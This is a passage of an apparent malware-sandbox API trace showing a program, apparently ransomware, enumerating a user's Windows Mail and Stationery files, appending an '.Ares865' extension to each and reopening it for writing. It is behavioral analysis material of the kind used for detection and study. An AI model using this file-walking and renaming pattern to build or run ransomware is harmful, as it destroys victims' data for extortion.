settings\\microsoft\\windows mail\\edbres00001.jrs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.088] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0098.220] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865") returned 91 [0098.221] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edbres00002.jrs.ares865"), dwFlags=0x1) returned 1 [0098.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edbres00002.jrs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.223] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0098.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865") returned 102 [0098.403] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore.ares865"), dwFlags=0x1) returned 1 [0098.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.msmessagestore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2113536) returned 1 [0098.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865") returned 91 [0098.557] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.pat.ares865"), dwFlags=0x1) returned 1 [0098.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\windowsmail.pat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0098.560] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0098.560] CloseHandle (hObject=0x0) returned 0 [0098.560] CloseHandle (hObject=0x118) returned 1 [0098.560] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9a12c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0098.560] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0098.560] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0098.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0098.560] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865") returned 96 [0098.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.htm.ares865"), dwFlags=0x1) returned 1 [0098.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.562] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=255) returned 1 [0098.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865") returned 96 [0098.576] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg.ares865"), dwFlags=0x1) returned 1 [0098.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.608] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1074) returned 1 [0098.619] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865") returned 98 [0098.619] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0098.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=645) returned 1 [0098.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865") returned 97 [0098.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.htm.ares865"), dwFlags=0x1) returned 1 [0098.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.634] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=231) returned 1 [0098.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865") returned 97 [0098.648] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg.ares865"), dwFlags=0x1) returned 1 [0098.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23871) returned 1 [0098.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865") returned 104 [0098.658] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm.ares865"), dwFlags=0x1) returned 1 [0098.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.659] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0098.662] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865") returned 103 [0098.662] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.ares865"), dwFlags=0x1) returned 1 [0098.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6406) returned 1 [0098.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865") returned 102 [0098.667] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm.ares865"), dwFlags=0x1) returned 1 [0098.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.669] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0098.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865") returned 101 [0098.683] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg.ares865"), dwFlags=0x1) returned 1 [0098.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.685] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4222) returned 1 [0098.688] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865") returned 105 [0098.688] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm.ares865"), dwFlags=0x1) returned 1 [0098.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.690] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0098.705] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865") returned 104 [0098.705] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg.ares865"), dwFlags=0x1) returned 1 [0098.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.708] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6381) returned 1 [0098.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865") returned 98 [0098.710] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm.ares865"), dwFlags=0x1) returned 1 [0098.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0098.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865") returned 98 [0098.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg.ares865"), dwFlags=0x1) returned 1 [0098.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5115) returned 1 [0098.772] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865") returned 96 [0098.772] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.htm.ares865"), dwFlags=0x1) returned 1 [0098.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.773] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0098.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865") returned 96 [0098.776] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg.ares865"), dwFlags=0x1) returned 1 [0098.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1920) returned 1 [0098.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865") returned 105 [0098.781] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm.ares865"), dwFlags=0x1) returned 1 [0098.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.782] 